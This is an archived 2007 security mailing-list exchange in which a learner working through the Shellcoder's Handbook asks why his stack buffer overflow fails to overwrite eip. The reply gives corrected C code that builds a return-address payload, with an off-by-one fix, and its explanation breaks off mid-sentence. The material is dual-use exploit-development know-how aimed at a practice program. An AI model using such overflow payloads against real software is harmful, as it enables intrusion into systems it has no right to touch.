Re: Controling the eip

From: Carl Livitt (carllivitt@yahoo.com)
Date: Tue May 15 2007 - 12:01:06 EDT


You'll need to share the source of the vulnerable code as well as the
code you already provided. I believe your code should look something
more like this, too:

#include <stdio.h>

main()
{
    int i=0;
    char stuffing[45]; // one more char allows you to null-terminate
    for (i=0; i<44; i+=4) // <= causes overflow, you need to use <
        *(long *) &stuffing[i] = 0x08048405;
    stuffing[44]='\0'; // remember to null-terminate
    puts(stuffing);
}

You'll notice that Cheers,
Carl

wymerzp@sbu.edu wrote:
> I am trying to learn about computer security. I picked up the book Shellcoder's Handbook (ISBN: 0-7645-4468-3)dump-perfect. When I inspect the stack with gdb it over-writes the eip with 0x41414141.
> I then look at the buffer size of the function as well as the address of said function (the purpose being to overflow the buffer, control eip to make the function iterate again) and the buffer size is 0x24 (36) and the address is 0x08048405.
> I then write a program to translate the hex into ASCII cleanly to insert into the buffer:
>
> #include <stdio.h>
>
> main()
> {
> int i=0;
> char stuffing[44];
> for (i=0; i<=44; i+=4)
> {
> *(long *) &stuffing[i] = 0x08048405;
> puts(stuffing);
> }
> }
>
> I then run the program and input the address as ASCII into the buffer as follows:
> bash# (./addresstochar;cat) | ./overflow
> which doesn't make the program iterate twice and doesn't change eip on inspection of the stack. What am I doing wrong here? I tried to be as thorough as possible; please forgive my verbosity. Thanks, Zach
>
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Are you using SPI, Watchfire or WhiteHat?
> Consider getting clear vision with Cenzic
> See HOW Now with our 20/20 program!
>
> http://www.cenzic.com/c/2020
> ------------------------------------------------------------------------
>
>
>

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:47 EDT